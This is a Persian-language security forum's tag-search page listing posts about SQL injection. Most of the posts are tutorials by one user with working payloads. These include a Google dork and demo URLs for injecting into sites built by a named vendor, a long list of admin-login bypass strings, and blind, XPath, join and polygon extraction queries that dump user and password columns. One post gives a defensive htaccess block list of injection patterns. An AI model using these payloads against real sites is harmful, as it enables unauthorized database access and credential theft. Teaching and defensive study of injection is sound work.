جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'sql injection'.
36 نتیجه پیدا شد
-
آموزش تصویری آموزش تصویری دوره کامل تست نفوذ با زیرنویس فارسی
mownten پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری
با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست. -
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
Sadra پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 45 پاسخ
-
- sql injection vulnerability
- اموزش ویدئویی
-
(و 55 مورد دیگر)
برچسب زده شده با :
- sql injection vulnerability
- اموزش ویدئویی
- vulnerability
- site hacking
- اموزش وب هکینگ
- sql injection method
- sql injection bypass
- sql injection ویدئویی
- sqli attack
- باگ بانتی
- هک
- تارگت های تمرینی
- video
- mysql
- polygon
- دیتابیس هکینگ
- وب هکینگ
- database attack
- سرور هکینگ
- هکر
- bug bounty
- باگ
- تارگت
- sqli
- bug
- web hacking
- bug crowd
- waf
- تزریق sql
- database hacking
- آموزش ویدئویی
- sql
- hack
- mr.msa
- bypass
- firewall
- mssql
- like
- cdn
- waf bypassing
- web application firewall
- cloudflare
- اموزش تست و نفوذ
- تارگت sql injection (تست و نفوذ ویدئویی )
- اسیب پذیری های تحت وب
- اسیب پذیری
- اسیب پذیری های سایت
- join
- اموزش هک
- اسیب پذیری sql injection
- اموزش به صورت ویدئویی
- sqli vulnerability
- website vulnerability
- اموزش هک سایت
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- اموزش برداشتن دیتابیس یک سایت
-
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
Sadra پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
web vulnerability آموزش آسیب پذیری Sql Injection با توضیح
Sadra پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز در این ویدئو آسیب پذیری Sql injection رو کار کردیم و بر خلاف ویدئو های قبل به همراه توضیح آموزش دادیم که مفاهیم رو بهتر یاد بگیرید. لایک، کامنت سابسکرایب فراموش نشه. موفق و پیروز باشید.-
- sql injection
- sql
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
xpath injection Xpath Injection Vulnerability Training
Sadra پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید : دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .-
- web application firewall bypass
- waf
- (و 16 مورد دیگر)
-
با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+
- 24 پاسخ
-
- web security
- web
- (و 13 مورد دیگر)
-
رفع اسیب پذیری Sql Injection با استفاده از Htaccess
Sadra پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .-
- رفع اسیب پذیری sql injection
- sqli
- (و 11 مورد دیگر)
-
با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
-
- bypass
- admin page
-
(و 10 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز در این تاپیک هر کس تمایل دارد sql injection رو یاد بگیرد (به صورت انلاین ) که خودم آموزش می دهم اینجا اعلام کند . توی تلگرام آموزش می دهم . ابتدا باید این جا اعلام کنید تا برای شما پیام ارسال کنم . فقط کسانی که ثبت نام کردن می توانند در اموزش شرکت کنند و دیگر یه عضو خوب باشه تو انجمن ، فعال و گذاشتن پست و... امیدوارم لذت ببرید . 😅
- 3 پاسخ
-
- sql injection
- sql
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
-
با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲) 99 < true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
- 3 پاسخ
-
- sql injection
- sql
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
-
با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
-
- sql injection
- bug
-
(و 13 مورد دیگر)
برچسب زده شده با :
-
بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
-
- sql injection
- sqli
-
(و 20 مورد دیگر)
برچسب زده شده با :
-
با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری : به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید : user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
- 3 پاسخ
-
- sql injection
- bug
-
(و 12 مورد دیگر)
برچسب زده شده با :
-
با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
- method
- method sql injection
-
(و 27 مورد دیگر)
برچسب زده شده با :
- method
- method sql injection
- sql
- sql injection
- bug
- web hacking
- site
- bypass
- bypass sql injection
- bypass sql
- نکته مهم در متد join
- متد join در sql injection
- mr.msa
- هک
- هک سایت
- وب هکینگ
- باگ
- بایپس
- بایپس sql injecion
- متد
- متد sql injection
- متد join
- دیتابیس هکینگ
- دیتابیس
- دیتابیس mysql
- mysql
- database hacking
- database mysql
- database attack
-
با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که : در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که : با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon : ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : [Hidden Content]((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ، پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
-
- دیتابیس
- method sql injection
-
(و 26 مورد دیگر)
برچسب زده شده با :
- دیتابیس
- method sql injection
- method
- آموزش
- bug
- وب هکینگ
- هک سایت
- باگ
- database hacking
- database
- web hacking
- sql injection
- sql
- bypass sql injection
- bypass sql
- bypass
- mr.msa
- متد sql injection
- متد
- بایپس sql
- بایپس sql injecion
- بایپس
- آموزش متد polygon در sql injection
- متد polygon
- mysql
- دیتابیس mysql
- دیتابیس هکینگ
- متد های حرفه ای
-
